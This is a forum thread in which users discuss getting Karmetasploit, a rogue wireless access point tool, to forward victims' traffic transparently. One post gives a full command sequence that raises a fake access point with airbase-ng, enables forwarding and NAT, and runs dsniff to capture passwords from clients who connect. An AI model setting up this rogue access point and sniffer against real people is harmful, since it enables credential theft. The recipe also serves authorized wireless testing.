Results 1 to 10 of 10

Thread: Transparent Karmetasploit

  1. #1
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    3

    Question Transparent Karmetasploit

    I got Karmetasploit up and running following the tutorial on Metasploit's site (metasploit.com/dev/trac/wiki/Karmetasploit). Everything works fine, however, when a client connects to karmetasploit, lets say the client tries to go to google...karmetasploit does its thing and gets information but google never loads.

    I cant seem to find any information on making karmetasploit transparent. Has anybody figured it out?

  2. #2
    Just burned his ISO alihadi's Avatar
    Join Date
    Aug 2008
    Posts
    8

    Default

    what is ur network configuration?
    how many nics and their configuration

  3. #3

    Default

    if you go back and read that documentation it will tell you that its a blackhole and doesnt forward traffic on

  4. #4
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    3

    Default

    Yea, I know. I saw a video of a demonstration of karmetasploit and he had it working transparently (I dont remember where I saw the video). I was curious to see if anybody know how he did it.

  5. #5
    Member Krytical's Avatar
    Join Date
    Mar 2010
    Posts
    117

    Default

    I have no clue have never used it... but I'm guessing you would need a separate internet connection and have all traffic proxied through that connection ... it'd be like bridging the connection....

    they connect to you, and you have it getting their info and then it passes it through to google or whatever through the other connection...

    don't think you can do it with just one connection...

  6. #6
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    It would seem that the main issue would be how well your system can route traffic. If your system has all the functionality of a wireless ap then it should be possible to masquerade as the friendly router and send the traffic back and forth.

    if you are trying to be just a transparent man in the middle that sniffs passwords (like what Cain and Abel do for a wired connections) then there may be a better way of going about it than karmetasploit. Since the main function of karmetasploit isn't to be passive but to find vulnerabilities which is much easier if the client thinks you are a legit AP and then exploit what you find to deliver your payload.

  7. #7

    Default

    To be able to do the attack the way you whant you have to install dnsmasq
    Code:
    wget vvvvvv.thekelleys[org][uk]/dnsmasq/dnsmasq-2.45.tar.gz (I have not reached 15 posts)
    tar xvzf dnsmasq-2.45.tar.gz
    cd dnsmasq-2.45
    make && make install
    once you have dnsmaq, create a conf file with the parameter you might need, then you can setup the machine to bridge from your wireless card to the NIC like this:

    Code:
    wlanconfig ath0 destroy
    airmon-ng start ath0
    airbase-ng -c 1 -e testwlan ath0
    ifconfig at0 192.168.179.1 up && dhcpd at0
    dnsmaq -C /etc/dnsmasq.conf &
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    once you are bridging and providing the correct DHCP and DNS info run dsniff -c -m -i at0. Do use the latest drivers and patch them and also use the latest svn of aircrack-ng, is this what you where looking for? your milage may vary depending on the card and the version of the driver.

  8. #8
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Hey Karma, any chance you could post the .conf file you used? Ive been working on mine and I keep getting glitches and Id like to compare them.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  9. #9
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I get this error when I follow your steps outlined above:
    Code:
     dnsmasq: failed to bind listening socket to 10.0.0.1: Address already in use
    or if I specify with -a:
    Code:
     dnsmasq: failed to create listening socket: Address already in use
    William

  10. #10
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    14

    Default

    i saw "the middler" do this at the last defcon, and he wasnt using a 2nd bridged connection. he basically sat in the middle forging replies to both ends, cool stuff, but i haven't found the code released yet...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •